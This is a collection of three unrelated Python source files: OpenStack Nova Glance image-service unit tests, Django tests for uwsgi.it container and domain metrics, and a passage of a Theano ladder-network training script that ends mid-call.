'owner': None,
},
]
self.assertEqual(image_metas, expected)
def test_show_makes_datetimes(self):
fixture = self._make_datetime_fixture()
image_id = self.service.create(self.context, fixture)['id']
image_meta = self.service.show(self.context, image_id)
self.assertEqual(image_meta['created_at'], self.NOW_DATETIME)
self.assertEqual(image_meta['updated_at'], self.NOW_DATETIME)
def test_detail_makes_datetimes(self):
fixture = self._make_datetime_fixture()
self.service.create(self.context, fixture)
image_meta = self.service.detail(self.context)[0]
self.assertEqual(image_meta['created_at'], self.NOW_DATETIME)
self.assertEqual(image_meta['updated_at'], self.NOW_DATETIME)
def test_download_with_retries(self):
tries = [0]
class MyGlanceStubClient(glance_stubs.StubGlanceClient):
"""A client that fails the first time, then succeeds."""
def get(self, image_id):
if tries[0] == 0:
tries[0] = 1
raise glanceclient.exc.ServiceUnavailable('')
else:
return {}
client = MyGlanceStubClient()
service = self._create_image_service(client)
image_id = 1 # doesn't matter
writer = NullWriter()
# When retries are disabled, we should get an exception
self.flags(glance_num_retries=0)
self.assertRaises(exception.GlanceConnectionFailed,
service.download, self.context, image_id, writer)
# Now lets enable retries. No exception should happen now.
tries = [0]
self.flags(glance_num_retries=1)
service.download(self.context, image_id, writer)
def test_client_forbidden_converts_to_imagenotauthed(self):
class MyGlanceStubClient(glance_stubs.StubGlanceClient):
"""A client that raises a Forbidden exception."""
def get(self, image_id):
raise glanceclient.exc.Forbidden(image_id)
client = MyGlanceStubClient()
service = self._create_image_service(client)
image_id = 1 # doesn't matter
writer = NullWriter()
self.assertRaises(exception.ImageNotAuthorized, service.download,
self.context, image_id, writer)
def test_client_httpforbidden_converts_to_imagenotauthed(self):
class MyGlanceStubClient(glance_stubs.StubGlanceClient):
"""A client that raises a HTTPForbidden exception."""
def get(self, image_id):
raise glanceclient.exc.HTTPForbidden(image_id)
client = MyGlanceStubClient()
service = self._create_image_service(client)
image_id = 1 # doesn't matter
writer = NullWriter()
self.assertRaises(exception.ImageNotAuthorized, service.download,
self.context, image_id, writer)
def test_client_notfound_converts_to_imagenotfound(self):
class MyGlanceStubClient(glance_stubs.StubGlanceClient):
"""A client that raises a NotFound exception."""
def get(self, image_id):
raise glanceclient.exc.NotFound(image_id)
client = MyGlanceStubClient()
service = self._create_image_service(client)
image_id = 1 # doesn't matter
writer = NullWriter()
self.assertRaises(exception.ImageNotFound, service.download,
self.context, image_id, writer)
def test_client_httpnotfound_converts_to_imagenotfound(self):
class MyGlanceStubClient(glance_stubs.StubGlanceClient):
"""A client that raises a HTTPNotFound exception."""
def get(self, image_id):
raise glanceclient.exc.HTTPNotFound(image_id)
client = MyGlanceStubClient()
service = self._create_image_service(client)
image_id = 1 # doesn't matter
writer = NullWriter()
self.assertRaises(exception.ImageNotFound, service.download,
self.context, image_id, writer)
def test_glance_client_image_id(self):
fixture = self._make_fixture(name='test image')
image_id = self.service.create(self.context, fixture)['id']
(service, same_id) = glance.get_remote_image_service(
self.context, image_id)
self.assertEquals(same_id, image_id)
def test_glance_client_image_ref(self):
fixture = self._make_fixture(name='test image')
image_id = self.service.create(self.context, fixture)['id']
image_url = 'http://something-less-likely/%s' % image_id
(service, same_id) = glance.get_remote_image_service(
self.context, image_url)
self.assertEquals(same_id, image_id)
self.assertEquals(service._client.host,
'something-less-likely')
def _create_failing_glance_client(info):
class MyGlanceStubClient(glance_stubs.StubGlanceClient):
"""A client that fails the first time, then succeeds."""
def get(self, image_id):
info['num_calls'] += 1
if info['num_calls'] == 1:
raise glanceclient.exc.ServiceUnavailable('')
return {}
return MyGlanceStubClient()
class TestGlanceClientWrapper(test.TestCase):
def setUp(self):
super(TestGlanceClientWrapper, self).setUp()
# host1 has no scheme, which is http by default
self.flags(glance_api_servers=['host1:9292', 'https://host2:9293',
'http://host3:9294'])
# Make the test run fast
def _fake_sleep(secs):
pass
self.stubs.Set(time, 'sleep', _fake_sleep)
def test_static_client_without_retries(self):
self.flags(glance_num_retries=0)
ctxt = context.RequestContext('fake', 'fake')
fake_host = 'host4'
fake_port = 9295
fake_use_ssl = False
info = {'num_calls': 0}
def _fake_create_glance_client(context, host, port, use_ssl, version):
self.assertEqual(host, fake_host)
self.assertEqual(port, fake_port)
self.assertEqual(use_ssl, fake_use_ssl)
return _create_failing_glance_client(info)
self.stubs.Set(glance, '_create_glance_client',
_fake_create_glance_client)
client = glance.GlanceClientWrapper(context=ctxt,
host=fake_host, port=fake_port, use_ssl=fake_use_ssl)
self.assertRaises(exception.GlanceConnectionFailed,
client.call, ctxt, 1, 'get', 'meow')
self.assertEqual(info['num_calls'], 1)
def test_default_client_without_retries(self):
self.flags(glance_num_retries=0)
ctxt = context.RequestContext('fake', 'fake')
info = {'num_calls': 0,
'host': 'host1',
'port': 9292,
'use_ssl': False}
# Leave the list in a known-order
def _fake_shuffle(servers):
pass
def _fake_create_glance_client(context, host, port, use_ssl, version):
self.assertEqual(host, info['host'])
self.assertEqual(port, info['port'])
self.assertEqual(use_ssl, info['use_ssl'])
return _create_failing_glance_client(info)
self.stubs.Set(random, 'shuffle', _fake_shuffle)
self.stubs.Set(glance, '_create_glance_client',
_fake_create_glance_client)
client = glance.GlanceClientWrapper()
client2 = glance.GlanceClientWrapper()
self.assertRaises(exception.GlanceConnectionFailed,
client.call, ctxt, 1, 'get', 'meow')
self.assertEqual(info['num_calls'], 1)
info = {'num_calls': 0,
'host': 'host2',
'port': 9293,
'use_ssl': True}
def _fake_shuffle2(servers):
# fake shuffle in a known manner
servers.append(servers.pop(0))
self.stubs.Set(random, 'shuffle', _fake_shuffle2)
self.assertRaises(exception.GlanceConnectionFailed,
client2.call, ctxt, 1, 'get', 'meow')
self.assertEqual(info['num_calls'], 1)
def test_static_client_with_retries(self):
self.flags(glance_num_retries=1)
ctxt = context.RequestContext('fake', 'fake')
fake_host = 'host4'
fake_port = 9295
fake_use_ssl = False
info = {'num_calls': 0}
def _fake_create_glance_client(context, host, port, use_ssl, version):
self.assertEqual(host, fake_host)
self.assertEqual(port, fake_port)
self.assertEqual(use_ssl, fake_use_ssl)
return _create_failing_glance_client(info)
self.stubs.Set(glance, '_create_glance_client',
_fake_create_glance_client)
client = glance.GlanceClientWrapper(context=ctxt,
host=fake_host, port=fake_port, use_ssl=fake_use_ssl)
client.call(ctxt, 1, 'get', 'meow')
self.assertEqual(info['num_calls'], 2)
def test_default_client_with_retries(self):
self.flags(glance_num_retries=1)
ctxt = context.RequestContext('fake', 'fake')
info = {'num_calls': 0,
'host0': 'host1',
'port0': 9292,
'use_ssl0': False,
'host1': 'host2',
'port1': 9293,
'use_ssl1': True}
# Leave the list in a known-order
def _fake_shuffle(servers):
pass
def _fake_create_glance_client(context, host, port, use_ssl, version):
attempt = info['num_calls']
self.assertEqual(host, info['host%s' % attempt])
self.assertEqual(port, info['port%s' % attempt])
self.assertEqual(use_ssl, info['use_ssl%s' % attempt])
return _create_failing_glance_client(info)
self.stubs.Set(random, 'shuffle', _fake_shuffle)
self.stubs.Set(glance, '_create_glance_client',
_fake_create_glance_client)
client = glance.GlanceClientWrapper()
client2 = glance.GlanceClientWrapper()
client.call(ctxt, 1, 'get', 'meow')
self.assertEqual(info['num_calls'], 2)
def _fake_shuffle2(servers):
# fake shuffle in a known manner
servers.append(servers.pop(0))
self.stubs.Set(random, 'shuffle', _fake_shuffle2)
info = {'num_calls': 0,
'host0': 'host2',
'port0': 9293,
'use_ssl0': True,
'host1': 'host3',
'port1': 9294,
'use_ssl1': False}
client2.call(ctxt, 1, 'get', 'meow')
self.assertEqual(info['num_calls'], 2)
|
|
import random
import json
from datetime import date, timedelta
from django.test import TestCase
from django.conf import settings
from django.utils.six.moves import xrange
from uwsgiit.api import UwsgiItClient
from console.utils import daterange
from console.models import *
class MetricTesterMixin():
@classmethod
def istanceUwsgiItClient(cls):
cls.client = UwsgiItClient(
settings.TEST_USER,
settings.TEST_PASSWORD,
settings.DEFAULT_API_URL)
@classmethod
def createTestMetrics(cls, metric_class):
parameters = {'container': 1}
if issubclass(metric_class, ContainerMetric):
pass
elif issubclass(metric_class, DomainMetric):
parameters['domain'] = 1
else:
raise TypeError('Cannot handle {class_name} class'.format(
class_name=metric_class.__name__))
start = date(2010, 1, 1)
end = date(2010, 12, 31)
cls.test_metrics = []
for day in daterange(start, end):
json = []
for i in xrange(5):
json.append([random.randint(1, 100), random.randint(1, 100)])
parameters['day'] = day.day
parameters['month'] = day.month
parameters['year'] = day.year
parameters['json'] = json
test_metric = metric_class(**parameters)
test_metric.save()
cls.test_metrics.append(test_metric)
@classmethod
def destroyTestMetrics(cls):
for metric in cls.test_metrics:
metric.delete()
class ContainerMetricTests(MetricTesterMixin, TestCase):
@classmethod
def setUpClass(cls):
cls.createTestMetrics(NetworkRXContainerMetric)
cls.today = date.today()
cls.yesterday = cls.today - timedelta(1)
cls.tomorrow = cls.today + timedelta(1)
def test_IOReadContainerMetric_returns_right_unit_of_measure(self):
self.assertEqual(IOReadContainerMetric().unit_of_measure, 'bytes')
def test_IOWriteContainerMetric_returns_right_unit_of_measure(self):
self.assertEqual(IOWriteContainerMetric().unit_of_measure, 'bytes')
def test_NetworkRXContainerMetric_returns_right_unit_of_measure(self):
self.assertEqual(NetworkRXContainerMetric().unit_of_measure, 'bytes')
def test_NetworkTXContainerMetric_returns_right_unit_of_measure(self):
self.assertEqual(NetworkTXContainerMetric().unit_of_measure, 'bytes')
def test_CPUContainerMetric_returns_right_unit_of_measure(self):
self.assertEqual(CPUContainerMetric().unit_of_measure, 'ticks')
def test_MemoryContainerMetric_returns_right_unit_of_measure(self):
self.assertEqual(MemoryContainerMetric().unit_of_measure, 'bytes')
def test_QuotaContainerMetric_returns_right_unit_of_measure(self):
self.assertEqual(QuotaContainerMetric().unit_of_measure, 'bytes')
def test_generic_metric_to_string_prints_date(self):
self.assertEqual(self.test_metrics[0].__unicode__(), '2010-1-1')
def test_metrics_returns_right_json_for_specific_day_from_db(self):
result = NetworkRXContainerMetric(container=1).metrics(
self.client, params={'year': 2010, 'month': 1, 'day': 1})
self.assertEqual(len(result), len(self.test_metrics[0].json))
self.assertEqual(sorted(result), sorted(self.test_metrics[0].json))
def test_metrics_returns_right_json_for_specific_month_from_db(self):
results = NetworkRXContainerMetric(container=1).metrics(
self.client, params={'year': 2010, 'month': 2})
january_metrics = []
[january_metrics.extend(el.json) for el in self.test_metrics[31:59]]
self.assertEqual(len(results), len(january_metrics))
self.assertEqual(sorted(results), sorted(january_metrics))
def test_metrics_returns_right_json_for_specific_year_from_db(self):
results = NetworkRXContainerMetric(container=1).metrics(
self.client, params={'year': 2010})
year_metrics = []
[year_metrics.extend(el.json) for el in self.test_metrics]
self.assertEqual(len(results), len(year_metrics))
self.assertEqual(sorted(results), sorted(year_metrics))
def test_metrics_does_not_save_current_day_in_db(self):
client = UwsgiItClient(
settings.TEST_USER,
settings.TEST_PASSWORD,
settings.DEFAULT_API_URL)
NetworkRXContainerMetric(container=settings.TEST_CONTAINER).metrics(
client, params={
'year': self.today.year,
'month': self.today.month,
'day': self.today.day})
self.assertRaises(
NetworkRXContainerMetric.DoesNotExist,
NetworkRXContainerMetric.objects.get,
**{'container': settings.TEST_CONTAINER,
'year': self.yesterday.year,
'month': self.yesterday.month,
'day': self.yesterday.day})
def test_metrics_returns_right_json_for_specific_day_from_api_and_saves_in_db(self):
client = UwsgiItClient(
settings.TEST_USER,
settings.TEST_PASSWORD,
settings.DEFAULT_API_URL)
results = NetworkRXContainerMetric(
container=settings.TEST_CONTAINER).metrics(
client, params={
'year': self.yesterday.year,
'month': self.yesterday.month,
'day': self.yesterday.day})
metric_from_db = NetworkRXContainerMetric.objects.get(
container=settings.TEST_CONTAINER,
year=self.yesterday.year,
month=self.yesterday.month,
day=self.yesterday.day)
self.assertEqual(results, json.loads(metric_from_db.json))
def test_metrics_does_not_return_metrics_from_future_asking_for_current_month(self):
"""Assumes that today is not the last day of month"""
client = UwsgiItClient(
settings.TEST_USER,
settings.TEST_PASSWORD,
settings.DEFAULT_API_URL)
NetworkRXContainerMetric(container=settings.TEST_CONTAINER).metrics(
client, params={
'year': self.today.year,
'month': self.today.month})
self.assertRaises(
NetworkRXContainerMetric.DoesNotExist,
NetworkRXContainerMetric.objects.get,
**{'container': settings.TEST_CONTAINER,
'year': self.tomorrow.year,
'month': self.tomorrow.month,
'day': self.tomorrow.day})
def test_metrics_returns_presents_metrics_from_db_and_missing_metrics_from_api(self):
"""Assumes that today is not the first day of month"""
client = UwsgiItClient(
settings.TEST_USER,
settings.TEST_PASSWORD,
settings.DEFAULT_API_URL)
test_metric = NetworkRXContainerMetric(
container=settings.TEST_CONTAINER,
json=[[-1, -2], [-3, -4]],
year=self.yesterday.year,
month=self.yesterday.month,
day=self.yesterday.day)
test_metric.save()
results = NetworkRXContainerMetric(container=settings.TEST_CONTAINER).metrics(
client, params={
'year': self.today.year,
'month': self.today.month})
self.assertIn(test_metric.json[0], results)
self.assertIn(test_metric.json[1], results)
test_metric.delete()
@classmethod
def tearDownClass(cls):
cls.destroyTestMetrics()
class DomainMetricTests(MetricTesterMixin, TestCase):
@classmethod
def setUpClass(cls):
cls.createTestMetrics(NetworkRXDomainMetric)
cls.today = date.today()
cls.yesterday = cls.today - timedelta(1)
cls.tomorrow = cls.today + timedelta(1)
def test_NetworkRXDomainMetric_returns_right_unit_of_measure(self):
self.assertEqual(NetworkRXDomainMetric().unit_of_measure, 'bytes')
def test_NetworkTXDomainMetric_returns_right_unit_of_measure(self):
self.assertEqual(NetworkTXDomainMetric().unit_of_measure, 'bytes')
def test_HitsDomainMetric_returns_right_unit_of_measure(self):
self.assertEqual(HitsDomainMetric().unit_of_measure, 'hits')
def test_generic_metric_to_string_prints_date(self):
self.assertEqual(self.test_metrics[0].__unicode__(), '2010-1-1')
def test_metrics_returns_right_json_for_specific_day_from_db(self):
result = NetworkRXDomainMetric(domain=1).metrics(
self.client, params={'year': 2010, 'month': 1, 'day': 1})
self.assertEqual(len(result), len(self.test_metrics[0].json))
self.assertEqual(sorted(result), sorted(self.test_metrics[0].json))
def test_metrics_returns_right_json_for_specific_month_from_db(self):
results = NetworkRXDomainMetric(domain=1).metrics(
self.client, params={'year': 2010, 'month': 2})
january_metrics = []
[january_metrics.extend(el.json) for el in self.test_metrics[31:59]]
self.assertEqual(len(results), len(january_metrics))
self.assertEqual(sorted(results), sorted(january_metrics))
def test_metrics_returns_right_json_for_specific_year_from_db(self):
results = NetworkRXDomainMetric(domain=1).metrics(
self.client, params={'year': 2010})
year_metrics = []
[year_metrics.extend(el.json) for el in self.test_metrics]
self.assertEqual(len(results), len(year_metrics))
self.assertEqual(sorted(results), sorted(year_metrics))
def test_metrics_does_not_save_current_day_in_db(self):
client = UwsgiItClient(
settings.TEST_USER,
settings.TEST_PASSWORD,
settings.DEFAULT_API_URL)
NetworkRXDomainMetric(domain=settings.TEST_DOMAIN).metrics(
client, params={
'year': self.today.year,
'month': self.today.month,
'day': self.today.day})
self.assertRaises(
NetworkRXDomainMetric.DoesNotExist,
NetworkRXDomainMetric.objects.get,
**{'domain': settings.TEST_DOMAIN,
'year': self.yesterday.year,
'month': self.yesterday.month,
'day': self.yesterday.day})
def test_metrics_returns_right_json_for_specific_day_from_api_and_saves_in_db(self):
client = UwsgiItClient(
settings.TEST_USER,
settings.TEST_PASSWORD,
settings.DEFAULT_API_URL)
results = NetworkRXDomainMetric(domain=settings.TEST_DOMAIN).metrics(
client, params={
'year': self.yesterday.year,
'month': self.yesterday.month,
'day': self.yesterday.day})
metric_from_db = NetworkRXDomainMetric.objects.get(
domain=settings.TEST_DOMAIN,
year=self.yesterday.year,
month=self.yesterday.month,
day=self.yesterday.day)
self.assertEqual(results, json.loads(metric_from_db.json))
def test_metrics_does_not_return_metrics_from_future_asking_for_current_month(self):
"""Assumes that today is not the last day of month"""
client = UwsgiItClient(
settings.TEST_USER,
settings.TEST_PASSWORD,
settings.DEFAULT_API_URL)
NetworkRXDomainMetric(domain=settings.TEST_DOMAIN).metrics(
client, params={
'year': self.today.year,
'month': self.today.month})
self.assertRaises(
NetworkRXDomainMetric.DoesNotExist,
NetworkRXDomainMetric.objects.get,
**{'domain': settings.TEST_DOMAIN,
'year': self.tomorrow.year,
'month': self.tomorrow.month,
'day': self.tomorrow.day})
def test_metrics_returns_presents_metrics_from_db_and_missing_metrics_from_api(self):
"""Assumes that today is not the first day of month"""
client = UwsgiItClient(
settings.TEST_USER,
settings.TEST_PASSWORD,
settings.DEFAULT_API_URL)
test_metric = NetworkRXDomainMetric(
container=settings.TEST_CONTAINER,
domain=settings.TEST_DOMAIN,
json=[[-1, -2], [-3, -4]],
year=self.yesterday.year,
month=self.yesterday.month,
day=self.yesterday.day)
test_metric.save()
results = NetworkRXDomainMetric(domain=settings.TEST_DOMAIN).metrics(
client, params={
'year': self.today.year,
'month': self.today.month})
self.assertIn(test_metric.json[0], results)
self.assertIn(test_metric.json[1], results)
test_metric.delete()
@classmethod
def tearDownClass(cls):
cls.destroyTestMetrics()
|
|
#!/usr/bin/env python
import functools
import logging
import os
import subprocess
from argparse import ArgumentParser, Action
from collections import OrderedDict
import sys
import numpy
import time
import theano
from theano.tensor.type import TensorType
from pandas import DataFrame
from blocks.algorithms import GradientDescent, Adam
from blocks.extensions import FinishAfter
from blocks.extensions.monitoring import TrainingDataMonitoring
from blocks.filter import VariableFilter
from blocks.graph import ComputationGraph
from blocks.main_loop import MainLoop
from blocks.model import Model
from blocks.roles import PARAMETER
from fuel.datasets import MNIST, CIFAR10
from fuel.schemes import ShuffledScheme, SequentialScheme
from fuel.streams import DataStream
from fuel.transformers import Transformer
from picklable_itertools import cycle, imap
from itertools import izip, product, tee
logger = logging.getLogger('main')
from utils import ShortPrinting, prepare_dir, load_df, DummyLoop
from utils import SaveExpParams, SaveLog, SaveParams, AttributeDict
from nn import ZCA, ContrastNorm
from nn import ApproxTestMonitoring, FinalTestMonitoring, TestMonitoring
from nn import LRDecay
from ladder import LadderAE
class Whitening(Transformer):
""" Makes a copy of the examples in the underlying dataset and whitens it
if necessary.
"""
def __init__(self, data_stream, iteration_scheme, whiten, cnorm=None,
**kwargs):
super(Whitening, self).__init__(data_stream,
iteration_scheme=iteration_scheme,
**kwargs)
data = data_stream.get_data(slice(data_stream.dataset.num_examples))
self.data = []
for s, d in zip(self.sources, data):
if 'features' == s:
# Fuel provides Cifar in uint8, convert to float32
d = numpy.require(d, dtype=numpy.float32)
if cnorm is not None:
d = cnorm.apply(d)
if whiten is not None:
d = whiten.apply(d)
self.data += [d]
elif 'targets' == s:
d = unify_labels(d)
self.data += [d]
else:
raise Exception("Unsupported Fuel target: %s" % s)
def get_data(self, request=None):
return (s[request] for s in self.data)
class SemiDataStream(Transformer):
""" Combines two datastreams into one such that 'target' source (labels)
is used only from the first one. The second one is renamed
to avoid collision. Upon iteration, the first one is repeated until
the second one depletes.
"""
def __init__(self, data_stream_labeled, data_stream_unlabeled, **kwargs):
super(Transformer, self).__init__(**kwargs)
self.ds_labeled = data_stream_labeled
self.ds_unlabeled = data_stream_unlabeled
# Rename the sources for clarity
self.ds_labeled.sources = ('features_labeled', 'targets_labeled')
# Rename the source for input pixels and hide its labels!
self.ds_unlabeled.sources = ('features_unlabeled',)
@property
def sources(self):
if hasattr(self, '_sources'):
return self._sources
return self.ds_labeled.sources + self.ds_unlabeled.sources
@sources.setter
def sources(self, value):
self._sources = value
def close(self):
self.ds_labeled.close()
self.ds_unlabeled.close()
def reset(self):
self.ds_labeled.reset()
self.ds_unlabeled.reset()
def next_epoch(self):
self.ds_labeled.next_epoch()
self.ds_unlabeled.next_epoch()
def get_epoch_iterator(self, **kwargs):
unlabeled = self.ds_unlabeled.get_epoch_iterator(**kwargs)
labeled = self.ds_labeled.get_epoch_iterator(**kwargs)
assert type(labeled) == type(unlabeled)
return imap(self.mergedicts, cycle(labeled), unlabeled)
def mergedicts(self, x, y):
return dict(list(x.items()) + list(y.items()))
def unify_labels(y):
""" Work-around for Fuel bug where MNIST and Cifar-10
datasets have different dimensionalities for the targets:
e.g. (50000, 1) vs (60000,) """
yshape = y.shape
y = y.flatten()
assert y.shape[0] == yshape[0]
return y
def make_datastream(dataset, indices, batch_size,
n_labeled=None, n_unlabeled=None,
balanced_classes=True, whiten=None, cnorm=None,
scheme=ShuffledScheme, dseed=None):
"""
:param dataset:
:param indices:
:param batch_size:
:param n_labeled: None, int, list
if None or 0 then all indices are used as labeled data.
otherwise only the first n_labeled indices are used as labeled.
If a list then balanced_classes must be true and the list specificy
the number of examples to take from each category.
:param n_unlabeled:
:param balanced_classes:
:param whiten:
:param cnorm:
:param scheme:
:return:
"""
if isinstance(n_labeled,tuple):
assert balanced_classes
n_labeled_list = n_labeled
n_labeled = sum(n_labeled) if len(n_labeled) > 0 else 0
else:
n_labeled_list = None
if n_labeled is None or n_labeled == 0:
n_labeled = len(indices)
if batch_size is None:
batch_size = len(indices)
if n_unlabeled is None:
n_unlabeled = len(indices)
assert n_labeled <= n_unlabeled, 'need less labeled than unlabeled'
all_data = dataset.data_sources[dataset.sources.index('targets')]
y = unify_labels(all_data)[indices]
if len(y):
n_classes = y.max() + 1
assert n_labeled_list is None or len(n_labeled_list) == n_classes
logger.info('#samples %d #class %d' % (len(y),n_classes))
for c in range(n_classes):
c_count = (y == c).sum()
logger.info('Class %d size %d %f%%' % (c, c_count, float(c_count)/len(y)))
# Get unlabeled indices
i_unlabeled = indices[:n_unlabeled]
if balanced_classes and n_labeled < n_unlabeled:
# Ensure each label is equally represented
logger.info('Balancing %d labels...' % n_labeled)
assert n_labeled % n_classes == 0
n_from_each_class = n_labeled / n_classes
i_labeled = []
for c in range(n_classes):
n_from_class = n_from_each_class if n_labeled_list is None else n_labeled_list[c]
# if a class does not have enough examples, then duplicate
ids = []
while len(ids) < n_from_class:
n = n_from_class - len(ids)
i = (i_unlabeled[y[:n_unlabeled] == c])[:n]
ids += list(i)
i_labeled += ids
# no need to shuffle the samples because latter
# ds=SemiDataStream(...,iteration_scheme=ShuffledScheme,...)
else:
i_labeled = indices[:n_labeled]
ds = SemiDataStream(
data_stream_labeled=Whitening(
DataStream(dataset),
iteration_scheme=scheme(i_labeled, batch_size),
whiten=whiten, cnorm=cnorm),
data_stream_unlabeled=Whitening(
DataStream(dataset),
iteration_scheme=scheme(i_unlabeled, batch_size),
whiten=whiten, cnorm=cnorm)
)
return ds
def setup_model(p):
ladder = LadderAE(p)
# Setup inputs
input_type = TensorType('float32', [False] * (len(p.encoder_layers[0]) + 1))
x_only = input_type('features_unlabeled')
x = input_type('features_labeled')
y = theano.tensor.lvector('targets_labeled')
ladder.apply(x, y, x_only)
# Load parameters if requested
if p.get('load_from'):
with open(p.load_from + '/trained_params.npz') as f:
loaded = numpy.load(f)
cg = ComputationGraph([ladder.costs.total])
current_params = VariableFilter(roles=[PARAMETER])(cg.variables)
logger.info('Loading parameters: %s' % ', '.join(loaded.keys()))
for param in current_params:
assert param.get_value().shape == loaded[param.name].shape
param.set_value(loaded[param.name])
return ladder
def load_and_log_params(cli_params):
cli_params = AttributeDict(cli_params)
if cli_params.get('load_from'):
p = load_df(cli_params.load_from, 'params').to_dict()[0]
p = AttributeDict(p)
for key in cli_params.iterkeys():
if key not in p:
p[key] = None
new_params = cli_params
loaded = True
else:
p = cli_params
new_params = {}
loaded = False
# Make dseed seed unless specified explicitly
if p.get('dseed') is None and p.get('seed') is not None:
p['dseed'] = p['seed']
logger.info('== COMMAND LINE ==')
logger.info(' '.join(sys.argv))
logger.info('== PARAMETERS ==')
for k, v in p.iteritems():
if new_params.get(k) is not None:
p[k] = new_params[k]
replace_str = "<- " + str(new_params.get(k))
else:
replace_str = ""
logger.info(" {:20}: {:<20} {}".format(k, v, replace_str))
return p, loaded
def setup_data(p, test_set=False):
if p.dataset in ['cifar10','mnist']:
dataset_class, training_set_size = {
'cifar10': (CIFAR10, 40000),
'mnist': (MNIST, 50000),
}[p.dataset]
else:
from fuel.datasets import H5PYDataset
from fuel.utils import find_in_data_path
from functools import partial
fn=p.dataset
fn=os.path.join(fn, fn + '.hdf5')
def dataset_class(which_sets):
return H5PYDataset(file_or_path=find_in_data_path(fn),
which_sets=which_sets,
load_in_memory=True)
training_set_size = None
train_set = dataset_class(["train"])
# Allow overriding the default from command line
if p.get('unlabeled_samples') is not None:
training_set_size = p.unlabeled_samples
elif training_set_size is None:
training_set_size = train_set.num_examples
# Make sure the MNIST data is in right format
if p.dataset == 'mnist':
d = train_set.data_sources[train_set.sources.index('features')]
assert numpy.all(d <= 1.0) and numpy.all(d >= 0.0), \
'Make sure data is in float format and in range 0 to 1'
# Take all indices and permutate them
all_ind = numpy.arange(train_set.num_examples)
if p.get('dseed'):
rng = numpy.random.RandomState(seed=p.dseed)
rng.shuffle(all_ind)
d = AttributeDict()
# Choose the training set
d.train = train_set
d.train_ind = all_ind[:training_set_size]
# Then choose validation set from the remaining indices
d.valid = train_set
d.valid_ind = numpy.setdiff1d(all_ind, d.train_ind)[:p.valid_set_size]
logger.info('Using %d examples for validation' % len(d.valid_ind))
# Only touch test data if requested
if test_set:
d.test = dataset_class(["test"])
d.test_ind = numpy.arange(d.test.num_examples)
# Setup optional whitening, only used for Cifar-10
in_dim = train_set.data_sources[train_set.sources.index('features')].shape[1:]
if len(in_dim) > 1 and p.whiten_zca > 0:
assert numpy.product(in_dim) == p.whiten_zca, \
'Need %d whitening dimensions, not %d' % (numpy.product(in_dim),
p.whiten_zca)
cnorm = ContrastNorm(p.contrast_norm) if p.contrast_norm != 0 else None
def get_data(d, i):
data = d.get_data(request=i)[d.sources.index('features')]
# Fuel provides Cifar in uint8, convert to float32
data = numpy.require(data, dtype=numpy.float32)
return data if cnorm is None else cnorm.apply(data)
if p.whiten_zca > 0:
logger.info('Whitening using %d ZCA components' % p.whiten_zca)
whiten = ZCA()
whiten.fit(p.whiten_zca, get_data(d.train, d.train_ind))
else:
whiten = None
return in_dim, d, whiten, cnorm
def get_error(args):
""" Calculate the classification error
called when evaluating
"""
args['data_type'] = args.get('data_type', 'test')
args['no_load'] = 'g_'
targets, acts = analyze(args)
guess = numpy.argmax(acts, axis=1)
correct = numpy.sum(numpy.equal(guess, targets.flatten()))
return (1. - correct / float(len(guess))) * 100.
def get_layer(args):
""" Get the output of the layer just below softmax
"""
args['data_type'] = args.get('data_type', 'test')
args['no_load'] = 'g_'
args['layer'] = args.get('layer', -1)
targets, acts = analyze(args)
return acts
def analyze(cli_params):
"""
called when evaluating
:return: inputs, result
"""
p, _ = load_and_log_params(cli_params)
_, data, whiten, cnorm = setup_data(p, test_set=(p.data_type == 'test'))
ladder = setup_model(p)
# Analyze activations
if p.data_type == 'train':
dset, indices, calc_batchnorm = data.train, data.train_ind, False
elif p.data_type == 'valid':
dset, indices, calc_batchnorm = data.valid, data.valid_ind, True
elif p.data_type == 'test':
dset, indices, calc_batchnorm = data.test, data.test_ind, True
else:
raise Exception("Unknown data-type %s"%p.data_type)
if calc_batchnorm:
logger.info('Calculating batch normalization for clean.labeled path')
main_loop = DummyLoop(
extensions=[
FinalTestMonitoring(
[ladder.costs.class_clean, ladder.error.clean]
+ ladder.costs.denois.values(),
make_datastream(data.train, data.train_ind,
# These need to match with the training
p.batch_size,
n_labeled=p.labeled_samples,
n_unlabeled=len(data.train_ind),
cnorm=cnorm,
whiten=whiten, scheme=ShuffledScheme),
make_datastream(data.valid, data.valid_ind,
p.valid_batch_size,
n_labeled=len(data.valid_ind),
n_unlabeled=len(data.valid_ind),
cnorm=cnorm,
whiten=whiten, scheme=ShuffledScheme),
prefix="valid_final", before_training=True),
ShortPrinting({
"valid_final": OrderedDict([
('VF_C_class', ladder.costs.class_clean),
('VF_E', ladder.error.clean),
('VF_C_de', [ladder.costs.denois.get(0),
ladder.costs.denois.get(1),
ladder.costs.denois.get(2),
ladder.costs.denois.get(3)]),
]),
}, after_training=True, use_log=False),
])
main_loop.run()
# Make a datastream that has all the indices in the labeled pathway
ds = make_datastream(dset, indices,
batch_size=p.get('batch_size'),
n_labeled=len(indices),
n_unlabeled=len(indices),
balanced_classes=False,
whiten=whiten,
cnorm=cnorm,
scheme=SequentialScheme)
# If layer=-1 we want out the values after softmax
outputs = ladder.act.clean.labeled.h[len(ladder.layers) - 1]
# Replace the batch normalization paramameters with the shared variables
if calc_batchnorm:
outputreplacer = TestMonitoring()
_, _, outputs = outputreplacer._get_bn_params(outputs)
cg = ComputationGraph(outputs)
f = cg.get_theano_function()
it = ds.get_epoch_iterator(as_dict=True)
res = []
inputs = {'features_labeled': [],
'targets_labeled': [],
'features_unlabeled': []}
# Loop over one epoch
for d in it:
# Store all inputs
for k, v in d.iteritems():
inputs[k] += [v]
# Store outputs
res += [f(*[d[str(inp)] for inp in cg.inputs])]
# Concatenate all minibatches
res = [numpy.vstack(minibatches) for minibatches in zip(*res)]
inputs = {k: numpy.concatenate(v) for k, v in inputs.iteritems()}
return inputs['targets_labeled'], res[0]
def dump_unlabeled_encoder(cli_params):
"""
called when dumping
:return: inputs, result
"""
p, _ = load_and_log_params(cli_params)
_, data, whiten, cnorm = setup_data(p, test_set=(p.data_type == 'test'))
ladder = setup_model(p)
# Analyze activations
if p.data_type == 'train':
dset, indices, calc_batchnorm = data.train, data.train_ind, False
elif p.data_type == 'valid':
dset, indices, calc_batchnorm = data.valid, data.valid_ind, True
elif p.data_type == 'test':
dset, indices, calc_batchnorm = data.test, data.test_ind, True
else:
raise Exception("Unknown data-type %s"%p.data_type)
if calc_batchnorm:
logger.info('Calculating batch normalization for clean.labeled path')
main_loop = DummyLoop(
extensions=[
FinalTestMonitoring(
[ladder.costs.class_clean, ladder.error.clean]
+ ladder.costs.denois.values(),
make_datastream(data.train, data.train_ind,
# These need to match with the training
p.batch_size,
